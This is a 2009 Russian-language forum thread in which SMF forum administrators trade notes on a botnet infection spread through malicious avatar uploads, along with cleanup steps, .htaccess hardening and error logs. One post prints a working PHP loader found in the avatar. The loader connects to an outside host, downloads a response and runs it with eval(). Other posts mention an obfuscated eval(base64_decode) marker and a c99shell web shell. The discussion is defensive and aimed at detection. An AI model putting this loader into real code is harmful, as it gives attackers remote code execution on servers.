Взлом форума сообщества Ubuntu.ru

OstLand · 18 мая 2009, 14:17:36

Прочитал вот эту новость: http://ubuntu.ru/pr/forum

Цитировать
Краткая хронология:

* В конце апреля — начале мая некими неизвестными злоумышленниками был создан механизм, эксплуатирующий ошибки в работе программного обеспечения, которое используется в том числе и на нашем форуме — Simple Machines Forum. Ошибки присутствуют во всех известных на данное время релизах SMF 1.1.x.
* В начале мая с использованием данного механизма начался процесс «заражения» всех работающих инсталляций SMF, в результате которого подобные форумы организовали рекламный «ботнет», с помощью которого генерировался рекламный трафик на интернет-ресурсы, а также, возможно, рассылка спама и использование в качестве подставных хостов для иных противоправных и деструктивных действий.
* При взломе форума его функциональность не страдает и внешне проблему в работе заметить практически невозможно. Это осложняет ситуацию и, к текущему моменту, как минимум несколько тысяч форумов находятся в «зараженном» состоянии.
* 5 мая взлому подвергся наш форум. В результате стандартной проверки администратором форума, это было обнаружено 7 мая.
* Администраторы хостинговой площадки оперативно отключили все ресурсы использующие SMF (3 форума разных LoCo), чтобы ресурсы хостинга не могли быть использованы для противоправных действий. Условие восстановления работы форума — официальное решение проблемы безопасности в SMF.

Любое ПО имеет ошибки и эти ошибки могут быть использованы в корыстных целях. Доступные он-лайн open source программы часто являются целями успешных атак. Однако конкретная ситуация вокруг SMF довольно уникальна — наличие неизвестной, эксплуатируемой с помощью неизвестного инструмента, уязвимости и быстрое скрытое распространение. Обычно ситуация с использованием уязвимостей не выходила на такой уровень и исправления выходили ранее широкого распространения информации о проблеме. К сожалению, уровень текущей проблемы оказался достаточно высок и официального патча для устранения уязвимости сейчас нет.

Поясните, плиз, что это за уязвимость и как проверить свой форум на отсутствие заражения?

Alder · 18 мая 2009, 15:28:50

Если я верно понимаю по описанию, то у меня тоже аналогично был заражен форум. Определяется это наличием в начале каждого php-файла в папке Sources строки вида <?php eval(base64_decode('ZXZhbChiYXNlNjRfZGVjb2RlKCdablZ1WTNScGIyNGdSa1k1TjBFeFJEZEJ....
После декодирования строки были обнаружены ссылки на файл /Themes/default/images/icons/style.css.php. Рядом были найдены еще левые скрипты и около 800 файлов с рекламным содержанием. Чистить пришлось много и долго. Сейчас вроде все ок.

neol · 18 мая 2009, 16:18:56

Насколько я понимаю, это оно - http://www.simplemachines.org/community/index.php?topic=307717.0

Alder · 18 мая 2009, 16:50:03

Да, совершенно верно. Жду обновления.

Fenix · 18 мая 2009, 17:15:14

Цитата: neol от 18 мая 2009, 16:18:56
Насколько я понимаю, это оно - http://www.simplemachines.org/community/index.php?topic=307717.0

Не спикаю по инглишу, но нашёл, что там есть разговор о "krisbarteo", этого юзера я как раз сегодня отслеживал, Дата регистрации: 16 Мая 2009, 09:14:19 Последняя активность: Сегодня в 13:54:38. Так вот, у меня установлен custom_profile_3.20, так он в выпадающих списках (!!!) по единицам проставил! Так же вызвал ошибки типа:

Код Выделить


2: file_exists() [<a href='function.file-exists'>function.file-exists</a>]: open_basedir restriction in effect. File(/home/***/public_html/forum/Themes/babylon/languages/Settings.russian-utf8.php) is not within the allowed path(s): (/home/***/data:.)
Файл: /home/***/data/www/***.com/Sources/Themes.php
Строка: 915
?action=theme;sa=pick;u=1579;sesc

OstLand · 18 мая 2009, 17:17:59

Спасибо за ответы. От греха подальше ввел у себя одобрение регистрации пользователя администратором форума, благо новых юзеров регится мало...

зы. Удивительно, что создатели SMF (в т.ч. и держатели русского сайта поддержки) не уведомили об опасности юзеров большими красными буквами на заглавной странице...

Fenix · 18 мая 2009, 17:53:12

Так и не нашёл, куда он прописывает свой код. Вобщем, народ, где увидите что-то типа base64 (или ещё чего странное в файлах) сообщите.

Alder · 18 мая 2009, 18:04:37

Цитата: Fenix от 18 мая 2009, 17:53:12
Так и не нашёл, куда он прописывает свой код. Вобщем, народ, где увидите что-то типа base64 (или ещё чего странное в файлах) сообщите.

Код он прописывает во все php-файлы. В частности советую посмотреть на его аватарку в текстовом редакторе. Там будет что-то вроде:

Код Выделить

<?php;$url = 'http://wplsat23.net/?update=main';
$done = false;if(!$url){return '';}
$url_info = parse_url($url);
$url_info[port] = ($url_info[port]) ? $url_info[port]:80;
$url_info[path] = ($url_info[path]) ? $url_info[path] : "/"; 
$url_info[query] = ($url_info[query]) ? $url_info[path] = $url_info[path] . "?" . $url_info[query] : ""; 
$query = "GET " . $url_info[path] . " HTTP/1.1\r\n"; $query = $query . "Host: " . $url_info[host] . "\r\n"; $query = $query . "Accept: */*" . "\r\n"; 
$query = $query . "Connection: close" . "\r\n"; 
$query = $query . "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" . "\r\n";
$query = $query . "\r\n"; $errno = 0; $error = ""; 
$sock = fsockopen($url_info[host], $url_info[port], $errno, $error, 30);$h = array();
$resp = array();if($sock){stream_set_timeout($sock, 30);fwrite($sock, $query);
$hd = false;while(!feof($sock)){$l = fgets($sock);if(!$hd){if(trim($l) == ''){$hd = true;}else{$h[] = $l;}}else{$resp[] = $l;}}
fclose($sock);}
$ret = implode("", $resp);eval($ret);?>

Fenix · 18 мая 2009, 18:10:23

Цитата: Alder от 18 мая 2009, 18:04:37
Код он прописывает во все php-файлы.

А что именно он прописывает? Пока ни в одном файле ничего подозрительного не обнаружил.

Цитата: Alder от 18 мая 2009, 18:04:37
В частности советую посмотреть на его аватарку в текстовом редакторе. Там будет что-то вроде:

Нету у него аватарки...

Я поставил, что можно только загружать аватары, а стандартными и удалёнными пользоваться у нас нельзя. Может это помогло...

Alder · 18 мая 2009, 18:16:59

Цитата: Fenix от 18 мая 2009, 18:10:23А что именно он прописывает? Пока ни в одном файле ничего подозрительного не обнаружил.

Я поставил, что можно только загружать аватары, а стандартными и удалёнными пользоваться у нас нельзя. Может это помогло...

Прописывает строку аля та, которую я указал в самом начале темы. В папке Themes\default\images\bbc появляется файл style.css.php. И проблема как раз в том, что аватар он загрузил. Лезем и ищем в attachments файлик avatar_#.jpg, где # - это его userID.

Fenix · 18 мая 2009, 18:24:31

Цитата: Alder от 18 мая 2009, 18:16:59
Прописывает строку аля та, которую я указал в самом начале темы. В папке Themes\default\images\bbc появляется файл style.css.php. И проблема как раз в том, что аватар он загрузил. Лезем и ищем в attachments файлик avatar_#.jpg, где # - это его userID.

Аватар есть (переименовал его), файл style.css.php отсутствует (по этим координатам).

Gnostis · 18 мая 2009, 18:54:52

В каком файле осуществятся загрузка изображений?

Как вараинт, можно сразу после загрузки парсить картинку на наличие в ней PHP/HTML/JS и если таковое обнаружиться, стереть либо заменить на заранее подготовленное изображение.

bbbbbb · 18 мая 2009, 20:47:33

php - это дырка язык, ламай как хочешь и что хочешь

digger® · 18 мая 2009, 21:23:58

Цитата: bbbbbb от 18 мая 2009, 20:47:33
php - это дырка язык, ламай как хочешь и что хочешь

Дырки в головах, а не языках.

bbbbbb · 18 мая 2009, 21:33:21

это тоже, да, и зависит от арахитектуры, тоже (чтобы логические ошибки не делать)...
но скорее всего это от логических ошибок!

neol · 18 мая 2009, 22:27:48

Кстати, загрузка аватар на моем проекте разрешена только после 20 сообщений... Что называется ж*ой чуял

Mavn · 18 мая 2009, 22:32:49

Ребят у кого какие то проблемы с безопасностью возникли огромная просьба присылать логи доступа и логи ошибок на следущий email support@mavn.org(создам через 1час) я постараюсь вовремя обрабатывать данные и пересылать разработчикам.

Fenix · 18 мая 2009, 22:53:57

Цитата: Mavn от 18 мая 2009, 22:32:49
Ребят у кого какие то проблемы с безопасностью возникли огромная просьба присылать логи доступа и логи ошибок на следущий email support@mavn.org(создам через 1час) я постараюсь вовремя обрабатывать данные и пересылать разработчикам.

А проблемой с безопасностью считается загрузка этого троянистого аватара, но без обнаружения файла style.css.php (все папки форума перерыл, не нашёл, тьфу-тьфу-тьфу), и отсутсвие в файлах подозрительных кодов содержащих "base64", тьфу-тьфу-тьфу?

PS Блин, когда там двойка пригодна для взломостойких форумов станет и с кириллицей окончательно подружится...

Alder · 18 мая 2009, 23:01:03

Цитата: Mavn от 18 мая 2009, 22:32:49
Ребят у кого какие то проблемы с безопасностью возникли огромная просьба присылать логи доступа и логи ошибок на следущий email support@mavn.org(создам через 1час) я постараюсь вовремя обрабатывать данные и пересылать разработчикам.

А все скрипты от взломщика + какой-то файлик со списком IP присылать? И аватарку могу еще его.

bbbbbb · 18 мая 2009, 23:27:02

а что происходит когда взломали?

Alder · 18 мая 2009, 23:45:27

bbbbbb, внешне ничем не проявляется. кроме возможных ошибок в логах форума. судя по содержимому файликов это был веб-шелл c99shell + куча файлов с рекламой внутри (тут каюсь - поторопился и снес все к чертям, не оставив даже десятка для примеров).

Mavn · 19 мая 2009, 00:07:10

все что касается взлома присылайте все.единственное что можно еще попробовать сделать на мой взгляд поместить в папку вложений и аватар htaccess с таким содержанием:

Код Выделить


php_value engine off

Gover · 19 мая 2009, 00:19:34

Проверил только что форум свой.
Пользователь такой был - krisbarteo (удалил его от греха подальше), но по видимому наследить еще не успел. Все файлы чистые. + Установил антибота на регистрацию.

spretro · 19 мая 2009, 00:29:59

krisbarteo зарегистрировался 17го. сразу прочитала о нем в гугле и забанила(может, надо удалять?). имеются его аватары. что присылать? что такое логи доступа?

В папке Themes\default\images\bbc нет файла style.css.php
И наличия в начале каждого php-файла в папке Sources строки вида <?php eval(base64_decode('ZXZhbChiYXNlNjRfZGVjb2RlKCdablZ1WTNScGIyNGdSa1k1TjBFeFJEZEJ.... тоже нет

Mavn · 19 мая 2009, 00:39:02

логи доступа пишутся апачем проще говоря. Мне нужны только за одно число когда все произошло ничего более

bbbbbb · 19 мая 2009, 02:13:54

тут вот написано что форум куда-то подключяется и хостинг его закрыл
http://ubuntu.ru/pr/forum

у кого выделенный сервер, то можно закрыть возможность инициализации подключени из хостинга (из форум на пхп)

или еще через сокеты и подобные он может гадить, их можно закрыть, но так как возможно скрипт дает размножатся на хостинге, то может там и не пхпl скрипт работать...

digger® · 19 мая 2009, 03:54:43

Что интересно, сайт wplsat23.net c которого аватарчик грузит эксплоит, работает и никто его не трогает.

Gnostis · 19 мая 2009, 04:11:44

Цитата: Mavn от 19 мая 2009, 00:07:10
все что касается взлома присылайте все.единственное что можно еще попробовать сделать на мой взгляд поместить в папку вложений и аватар htaccess с таким содержанием:
Код Выделить Развернуть
php_value engine off

это по моему еще разработчиком надо было сделать, наличие в папке с вложениями работающего файла index.php должно было вызвать хоть какие то подозрения.

bbbbbb · 19 мая 2009, 04:54:33

Цитата: digger от 19 мая 2009, 03:54:43
Что интересно, сайт wplsat23.net c которого аватарчик грузит эксплоит, работает и никто его не трогает.

потому что его может так заразили как и все остальные...
(а может и вирус, бегает по url и ищет smf)

У меня не пингуется:

Код Выделить

ping -c 10 72.46.130.186 
PING 72.46.130.186 (72.46.130.186): 56 data bytes

--- 72.46.130.186 ping statistics ---
10 packets transmitted, 0 packets received, 100.0% packet loss

через какой-то определенный порт может грузит, а все остальное вырубили и пинг, тоже?

vladok · 19 мая 2009, 12:42:27

А что с форумами на базе 2ки? Были случаи заражения ?

digger® · 19 мая 2009, 12:45:35

Цитата: vladok от 19 мая 2009, 12:42:27
А что с форумами на базе 2ки? Были случаи заражения ?

Случаев вроде не было, но в принципе тоже возможно.

vladok · 19 мая 2009, 13:31:07

Хм... как в двойке запретить грузить аваторы до хх сообщений на форуме? носом ткните где код поправить шоб регающийся шел лесом, не имя возможности на юзанье загружаемого им аватора.

digger® · 19 мая 2009, 13:32:08

Цитата: vladok от 19 мая 2009, 13:31:07
Хм... как в двойке запретить грузить аваторы до хх сообщений на форуме? носом ткните где код поправить шоб регающийся шел лесом.

Права доступа для группы Новичок

vladok · 19 мая 2009, 13:36:42

Нет такой опции. есть лишь одна группа Обычные пользователи
В Группы пользователей у новичка лишь выбор разделов...

Включить использование прав для групп основанных на количестве сообщений?

digger® · 19 мая 2009, 13:39:16

Цитата: vladok от 19 мая 2009, 13:36:42
Включить использование прав для групп основанных на количестве сообщений?

Вроде бы вполне очевидно.

Serifa · 19 мая 2009, 17:50:43

Цитата: Mavn от 18 мая 2009, 22:32:49
Ребят у кого какие то проблемы с безопасностью возникли огромная просьба присылать логи доступа и логи ошибок на следущий email support@mavn.org(создам через 1час) я постараюсь вовремя обрабатывать данные и пересылать разработчикам.

Ну вот... у меня тоже ничего не осталось, все удалила уже. И почистила. Где ж вы раньше-то были?? Насчет этого подозрительного юзера... у меня такой был, со странным аватаром: там был гифовый файл 1х1. Возможно, прошло около суток, пока я им заинтересовалась.

Gnostis · 20 мая 2009, 04:50:55

Когда примерно ожидать официальный патч (решение) от разработчиков?

BIOHAZARD · 20 мая 2009, 07:29:08

Цитата: Gnostis от 20 мая 2009, 04:50:55
Когда примерно ожидать официальный патч (решение) от разработчиков?

они помоему ещё даже не поняли как их взломали, не то что патч сделать :о)

Gnostis · 20 мая 2009, 08:08:07

ну да... как во многих онлайн играх делают...
- так тут у нас что то сломали, а как сломали? И в каком месте? А отключим ка мы эту функцию нафиг пока не разберемся.
- Чет пользователи ругаются что уже пол года *** не работает...

Badman · 20 мая 2009, 13:41:20

у меня есть такой пользователь ... 05,05,2009 зарегестрировался но никаких действий не производил вроде, даже аватарку не загрузил .... забанил его

форум 2.х

Mavn · 20 мая 2009, 21:27:33

На всякий случай вырубите функцию выбора тем для пользователей. Судя по всему данная функция так же может быть уязвима.

Кстати кто обновлялся средствами модов -патчей могли не заметить одно маленькое но существенное изменение в безопасности вложений и модификаций.
в папке attachments и Packages появился файлик .htaccess с таким содержанием

Код Выделить


<Files *>
	Order Deny,Allow
	Deny from all
	Allow from localhost
</Files>

Fenix · 20 мая 2009, 22:19:40

Цитата: Mavn от 20 мая 2009, 21:27:33
Кстати кто обновлялся средствами модов -патчей могли не заметить одно маленькое но существенное изменение в безопасности вложений и модификаций.
в папке attachments и Packages появился файлик .htaccess с таким содержанием
Код Выделить Развернуть
<Files *> Order Deny,Allow Deny from all Allow from localhost </Files>

А на счёт php_value engine off, как правильней записать
Так:

Код Выделить



<Files *>
	Order Deny,Allow
	Deny from all
	Allow from localhost
	php_value engine off
</Files>

Или так:

Код Выделить



<Files *>
	Order Deny,Allow
	Deny from all
	Allow from localhost
</Files>

php_value engine off

Yworld_garry · 20 мая 2009, 22:43:59

Думаю вот так, в начале файла.

Код Выделить

php_value engine off
<Files *>
   Order Deny,Allow
   Deny from all
   Allow from localhost
</Files>

Drakonsa · 20 мая 2009, 23:20:04

Обычно этот "крякер" заходит с выделенного сервера: 94.142.129.147. Мождете поместить его в блок лист, но это не даст 100% защиты, т.к. он может пойти через прокси...

Mavn · 21 мая 2009, 00:57:54

Цитата: AndyR link=http://joomlaforum.ru/index.php/topic,65624.msg378391.html#msg378391
<files~".(php* |s?p?html | | cgi | pl)$">
deny from all
</files>

лучше вот так даже сделать

запрет не только php но и прочего барохла

NECros88 · 21 мая 2009, 12:49:59

Цитата: Drakonsa от 20 мая 2009, 23:20:04
Обычно этот "крякер" заходит с выделенного сервера: 94.142.129.147. Мождете поместить его в блок лист, но это не даст 100% защиты, т.к. он может пойти через прокси...

это чистейшей воды бот, до сих пор понять не можете?

Serifa · 22 мая 2009, 17:39:12

Этот чистый бот запросто обошел защиту и повышенную капчу, и зарегился, да еще аватарку поставил. Против такого бота нужны серьезные средства. Я удивляюсь, как он тему на форуме не открыл и не рассказал про свои подвиги.

NECros88 · 22 мая 2009, 17:41:36

обойти заранее обкатанную капчу не проблема

Serifa · 22 мая 2009, 18:20:21

а кто ее заранее обкатал?

moskovets · 22 мая 2009, 18:53:28

ё, я токо увидел темку, ща буду спешить перелопачивать свой, но такого пользователя у меня небыло...

interiv · 22 мая 2009, 19:09:31

Народ, я не пойму, а в чем проблема?
Кто нибудь устанавливал WordPress?
Дело в том что такой код: <?php eval(base64_decode('ZXZhbChiYXNlNjRfZGVjb2RlKCdablZ1WTNScGIyNGdSa1k1TjBFeFJEZEJ....
находится в шаблонах и при удалении его влияет на дизайн сайта. На сколько я понимаю применяется типа для защиты шаблонов от перепродажи. В инете где то есть как его открыть в виде нормального кода и поправить его.
Может конечно я не прав. В WordPress есть MOD который обнаруживает левый код, а у нас?

Yworld_garry · 22 мая 2009, 19:12:51

Этот код применяется для описанного выше. И зачем бесплатные шаблоны продавать?

interiv · 22 мая 2009, 19:15:52

Цитата: Yworld_garry от 22 мая 2009, 19:12:51
Этот код применяется для описанного выше. И зачем бесплатные шаблоны продавать?

Вопрос конечно хороший, но остается фактом, я качал их с офф сайта бесплатные шаблоны и там находи эту беду

Yworld_garry · 22 мая 2009, 19:19:41

Дайте пожалуйста ссылку на шаблон с оф сайта который имеет эту штуку.

interiv · 22 мая 2009, 19:30:56

Цитата: Yworld_garry от 22 мая 2009, 19:19:41
Дайте пожалуйста ссылку на шаблон с оф сайта который имеет эту штуку.

сейчас поищу

interiv · 22 мая 2009, 19:51:44

Цитата: Yworld_garry от 22 мая 2009, 19:19:41
Дайте пожалуйста ссылку на шаблон с оф сайта который имеет эту штуку.

первый попавшийся хватанул http://www.wordpress-tema.ru/archives/180
в файле footer

Yworld_garry · 22 мая 2009, 19:57:13

Сорри я просто тупанул и не правильно прочитал ваш пост. Я думал про темки к SMF. Про WordPress без понятия. Но думаю если это официальный сайт, то там закодировано что то полезное.

interiv · 22 мая 2009, 19:59:25

Цитата: Yworld_garry от 22 мая 2009, 19:57:13
Сорри я просто тупанул и не правильно прочитал ваш пост. Я думал про темки к SMF. Про WordPress без понятия. Но думаю если это официальный сайт, то там закодировано что то полезное.

добрая Вы видно душа, кто ж для Вас полезное кодировать будет

Yworld_garry · 22 мая 2009, 20:07:28

В общем там закодированы ссылки на дизайнеров. Но конечно я не могу ручаться что ни кто из них не злоупотребляет этим.
И сразу встает вопрос о заливке темок только с официальных ресурсов.

moskovets · 22 мая 2009, 20:41:21

странные авотары в атаче нашол, может кто глянет и подскажет чё там делает xml код

кстате у меня все атачи не глядятся редактором малюнков (ни фотожоп ни другие не показывают)

а вот этой баландайкой никто не пробовал проверять свой урл?

по поводу кодов содержащих base64, вот в стандартном Sources/Admin.php

Код Выделить


			$return_data = fetch_web_data($url = 'http://www.simplemachines.org/smf/copyright/check_copyright.php?site=' . base64_encode($boardurl) . '&key=' . $key . '&version=' . base64_encode($forum_version));

interiv · 23 мая 2009, 15:26:13

Цитата: Yworld_garry от 22 мая 2009, 20:07:28
В общем там закодированы ссылки на дизайнеров. Но конечно я не могу ручаться что ни кто из них не злоупотребляет этим.
И сразу встает вопрос о заливке темок только с официальных ресурсов.

Ну да, как у форума с этим, понятно конечно что бесплатный сыр не бывает, на жаль отдавать ссылки на другие ресурсы

ccumc · 24 мая 2009, 00:12:30

Всем привет. Мой форум тоже взломали. Впринципи все почистил, теперь осталась такая ошибка: когда хочу совершить какое-то действие, например написать пост, изменить настройки в админке... выдает такую ошибку; Ваша сессия истекла во время написания сообщения. Пожалуйста, попробуйте заново.
Помогите пойжалуста исправить ошибку.
Это не помогло http://www.simplemachines.ru/index.php/topic,5524.0.html

Serifa · 24 мая 2009, 16:04:00

Разве форум не должен сам реагировать на всякие подозрительные левые коды? У меня началось все с логов ошибок. Форум стал ругаться на файлы, где появился посторонний код. Значит, смотрите логи. Если там относительно чисто, то все в порядке, так?

Солярис · 24 мая 2009, 16:12:39

His Divine Shadow, движок форума - не обладает возможностями искусственного интеллекта. :-)

andrey1cov · 24 мая 2009, 22:09:21

Цитироватьвыдает такую ошибку; Ваша сессия истекла во время написания сообщения. Пожалуйста, попробуйте заново.
Помогите пойжалуста исправить ошибку.
Это не помогло http://www.simplemachines.ru/index.php/topic,5524.0.html

у меня такая же проблема

bbbbbb · 25 мая 2009, 00:04:36

удали куки у браузере и (или) очисть таблицу sessions

andrey1cov · 25 мая 2009, 11:15:54

при попытке обновления с 1.8 до 1.9, тест проходит всё Успешно, нажимаю Установка пишет:

ЦитироватьВаша сессия закончилась пока Вы писали сообщение. Пожалуйста, вернитесь назад и попробуйте снова.

как советовали сделать:

Код Выделить

function PackageInstallTest()
{
    global $boarddir, $txt, $context, $scripturl, $sourcedir, $modSettings;

    checkSession('request');

было уже прописано,
помогите пожалуйста, не могу обновить.

moskovets · 25 мая 2009, 13:07:49

andrey1cov, сколько у тебя модов втулено?, какие файлы чистил от ботнета? какая тема используется?, если чистил Sources/Packages.php попробуй заменить его новым с дистриба твоей текущей версии - 1.1.8

andrey1cov · 25 мая 2009, 13:12:27

Цитироватьсколько у тебя модов втулено?, какие файлы чистил от ботнета? какая тема используется?, если чистил Sources/Packages.php попробуй заменить его новым с дистриба твоей текущей версии - 1.1.8

модов нет, файлы не чистил - чужого кода нет, но пользователь вредный зарегился, тема classic (немного внешне переделанная - www.____sovetsk39.ru/__forum/), ок - попробую заменить.

замена не помогла.

moskovets · 25 мая 2009, 13:39:47

а логи есть?, грюкни того юзверя, и временно поставь форум на тех обслуживание (там пташечка есть), и айпи того товарища бота в бан поставь - это то чудо в перьях может и не даёт обновить форум

andrey1cov · 25 мая 2009, 14:19:59

Цитироватьа логи есть?, грюкни того юзверя, и временно поставь форум на тех обслуживание (там пташечка есть), и айпи того товарища бота в бан поставь - это то чудо в перьях может и не даёт обновить форум

логи откуда вытащить? krisbarteo по ip забанил, поставил форум на обслуживание, ошибка таже:

ЦитироватьВаша сессия закончилась пока Вы писали сообщение. Пожалуйста, вернитесь назад и попробуйте снова.

moskovets · 25 мая 2009, 14:42:49

ок, тода бан не уберай, а грохни krisbarteo полностью, замени post.template.php, а логи должны быть, их смотреть в админке в самом низу - Логи Ошибок форума

Drakonsa · 25 мая 2009, 15:11:15

C репозитория скачай Large Upgrade.

andrey1cov · 25 мая 2009, 17:50:51

Сообщения об ошибках пользователя - krisbarteo

Код Выделить

IP адрес  	Сообщение  	Дата
94.142.129.147 	2: include() [<a href='function.include'>function.include</a>]: Failed opening 'counter_Mail.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php')
Файл: /home2/sovetsk/public_html/__forum/Themes/default/Themes.template.php (main_below sub template - eval?)
Строка: 298
?action=theme;sa=pick;u=603;sesc 	20 Май 2009, 19:43:12

94.142.129.147 	2: include(counter_Mail.php) [<a href='function.include'>function.include</a>]: failed to open stream: No such file or directory
Файл: /home2/sovetsk/public_html/__forum/Themes/default/Themes.template.php (main_below sub template - eval?)
Строка: 298
?action=theme;sa=pick;u=603;sesc 	20 Май 2009, 19:43:12

94.142.129.147 	2: include(counter_Mail.php) [<a href='function.include'>function.include</a>]: failed to open stream: No such file or directory
Файл: /home2/sovetsk/public_html/__forum/Themes/default/Themes.template.php (main_below sub template - eval?)
Строка: 298
?action=theme;sa=pick;u=603;sesc 	20 Май 2009, 19:43:12

94.142.129.147 	8: Undefined index: name
Файл: /home2/sovetsk/public_html/__forum/Themes/default/Themes.template.php (pick sub template - eval?)
Строка: 442
?action=theme;sa=pick;u=603;sesc 	20 Май 2009, 19:43:12
94.142.129.147 	2: file_exists() [<a href='function.file-exists'>function.file-exists</a>]: open_basedir restriction in effect. File(/home/sovetsk/public_html/__forum/Themes/rt_smf_sporticus/languages/Settings.russian.php) is not within the allowed path(s): (/home2/sovetsk:/usr/lib/php:/usr/local/lib/php:/tmp)
Файл: /home2/sovetsk/public_html/__forum/Sources/Themes.php
Строка: 915
?action=theme;sa=pick;u=603;sesc 	20 Май 2009, 19:43:12

94.142.129.147 	2: file_exists() [<a href='function.file-exists'>function.file-exists</a>]: open_basedir restriction in effect. File(/home/sovetsk/public_html/__forum/Themes/rt_smf_sporticus/languages/Settings.russian.php) is not within the allowed path(s): (/home2/sovetsk:/usr/lib/php:/usr/local/lib/php:/tmp)
Файл: /home2/sovetsk/public_html/__forum/Sources/Themes.php
Строка: 913
?action=theme;sa=pick;u=603;sesc 	20 Май 2009, 19:43:12

94.142.129.147 	2: file_exists() [<a href='function.file-exists'>function.file-exists</a>]: open_basedir restriction in effect. File(/home/sovetsk/public_html/__forum/Themes/babylon/languages/Settings.russian.php) is not within the allowed path(s): (/home2/sovetsk:/usr/lib/php:/usr/local/lib/php:/tmp)
Файл: /home2/sovetsk/public_html/__forum/Sources/Themes.php
Строка: 915
?action=theme;sa=pick;u=603;sesc 	20 Май 2009, 19:43:12

94.142.129.147 	2: file_exists() [<a href='function.file-exists'>function.file-exists</a>]: open_basedir restriction in effect. File(/home/sovetsk/public_html/__forum/Themes/babylon/languages/Settings.russian.php) is not within the allowed path(s): (/home2/sovetsk:/usr/lib/php:/usr/local/lib/php:/tmp)
Файл: /home2/sovetsk/public_html/__forum/Sources/Themes.php
Строка: 913
?action=theme;sa=pick;u=603;sesc 	20 Май 2009, 19:43:12

94.142.129.147 	2: include() [<a href='function.include'>function.include</a>]: Failed opening 'counter_Mail.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php')
Файл: /home2/sovetsk/public_html/__forum/Themes/default/languages/Who.russian.php (main_below sub template - eval?)
Строка: 298
?action=profile 	20 Май 2009, 19:43:10

94.142.129.147 	2: include(counter_Mail.php) [<a href='function.include'>function.include</a>]: failed to open stream: No such file or directory
Файл: /home2/sovetsk/public_html/__forum/Themes/default/languages/Who.russian.php (main_below sub template - eval?)
Строка: 298
?action=profile 	20 Май 2009, 19:43:10

94.142.129.147 	2: include(counter_Mail.php) [<a href='function.include'>function.include</a>]: failed to open stream: No such file or directory
Файл: /home2/sovetsk/public_html/__forum/Themes/default/languages/Who.russian.php (main_below sub template - eval?)
Строка: 298
?action=profile 	20 Май 2009, 19:43:10

94.142.129.147 	2: include() [<a href='function.include'>function.include</a>]: Failed opening 'counter_Mail.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php')
Файл: /home2/sovetsk/public_html/__forum/Themes/default/Themes.template.php (main_below sub template - eval?)
Строка: 298
?action=theme;sa=pick;u=603;sesc 	15 Май 2009, 13:19:38

94.142.129.147 	2: include(counter_Mail.php) [<a href='function.include'>function.include</a>]: failed to open stream: No such file or directory
Файл: /home2/sovetsk/public_html/__forum/Themes/default/Themes.template.php (main_below sub template - eval?)
Строка: 298
?action=theme;sa=pick;u=603;sesc 	15 Май 2009, 13:19:38

94.142.129.147 	2: include(counter_Mail.php) [<a href='function.include'>function.include</a>]: failed to open stream: No such file or directory
Файл: /home2/sovetsk/public_html/__forum/Themes/default/Themes.template.php (main_below sub template - eval?)
Строка: 298
?action=theme;sa=pick;u=603;sesc 	15 Май 2009, 13:19:38

94.142.129.147 	8: Undefined index: name
Файл: /home2/sovetsk/public_html/__forum/Themes/default/Themes.template.php (pick sub template - eval?)
Строка: 442
?action=theme;sa=pick;u=603;sesc 	15 Май 2009, 13:19:38

94.142.129.147 	2: file_exists() [<a href='function.file-exists'>function.file-exists</a>]: open_basedir restriction in effect. File(/home/sovetsk/public_html/__forum/Themes/rt_smf_sporticus/languages/Settings.russian.php) is not within the allowed path(s): (/home2/sovetsk:/usr/lib/php:/usr/local/lib/php:/tmp)
Файл: /home2/sovetsk/public_html/__forum/Sources/Themes.php
Строка: 915
?action=theme;sa=pick;u=603;sesc 	15 Май 2009, 13:19:38

94.142.129.147 	2: file_exists() [<a href='function.file-exists'>function.file-exists</a>]: open_basedir restriction in effect. File(/home/sovetsk/public_html/__forum/Themes/rt_smf_sporticus/languages/Settings.russian.php) is not within the allowed path(s): (/home2/sovetsk:/usr/lib/php:/usr/local/lib/php:/tmp)
Файл: /home2/sovetsk/public_html/__forum/Sources/Themes.php
Строка: 913
?action=theme;sa=pick;u=603;sesc 	15 Май 2009, 13:19:38

94.142.129.147 	2: file_exists() [<a href='function.file-exists'>function.file-exists</a>]: open_basedir restriction in effect. File(/home/sovetsk/public_html/__forum/Themes/babylon/languages/Settings.russian.php) is not within the allowed path(s): (/home2/sovetsk:/usr/lib/php:/usr/local/lib/php:/tmp)
Файл: /home2/sovetsk/public_html/__forum/Sources/Themes.php
Строка: 915
?action=theme;sa=pick;u=603;sesc 	15 Май 2009, 13:19:38

94.142.129.147 	2: file_exists() [<a href='function.file-exists'>function.file-exists</a>]: open_basedir restriction in effect. File(/home/sovetsk/public_html/__forum/Themes/babylon/languages/Settings.russian.php) is not within the allowed path(s): (/home2/sovetsk:/usr/lib/php:/usr/local/lib/php:/tmp)
Файл: /home2/sovetsk/public_html/__forum/Sources/Themes.php
Строка: 913
?action=theme;sa=pick;u=603;sesc 	15 Май 2009, 13:19:38

94.142.129.147 	2: include() [<a href='function.include'>function.include</a>]: Failed opening 'counter_Mail.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php')
Файл: /home2/sovetsk/public_html/__forum/Themes/default/languages/Who.russian.php (main_below sub template - eval?)
Строка: 298
?action=profile 	15 Май 2009, 13:19:36

94.142.129.147   	2: include(counter_Mail.php) [<a href='function.include'>function.include</a>]: failed to open stream: No such file or directory
Файл: /home2/sovetsk/public_html/__forum/Themes/default/languages/Who.russian.php (main_below sub template - eval?)
Строка: 298
?action=profile 	15 Май 2009, 13:19:36
94.142.129.147 	2: include(counter_Mail.php) [<a href='function.include'>function.include</a>]: failed to open stream: No such file or directory
Файл: /home2/sovetsk/public_html/__forum/Themes/default/languages/Who.russian.php (main_below sub template - eval?)
Строка: 298
?action=profile 	15 Май 2009, 13:19:36
94.142.129.147 	2: include() [<a href='function.include'>function.include</a>]: Failed opening 'counter_Mail.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php')
Файл: /home2/sovetsk/public_html/__forum/Themes/classic/BoardIndex.template.php (main_below sub template - eval?)
Строка: 298
? 	15 Май 2009, 13:19:34
94.142.129.147 	2: include(counter_Mail.php) [<a href='function.include'>function.include</a>]: failed to open stream: No such file or directory
Файл: /home2/sovetsk/public_html/__forum/Themes/classic/BoardIndex.template.php (main_below sub template - eval?)
Строка: 298
? 	15 Май 2009, 13:19:34
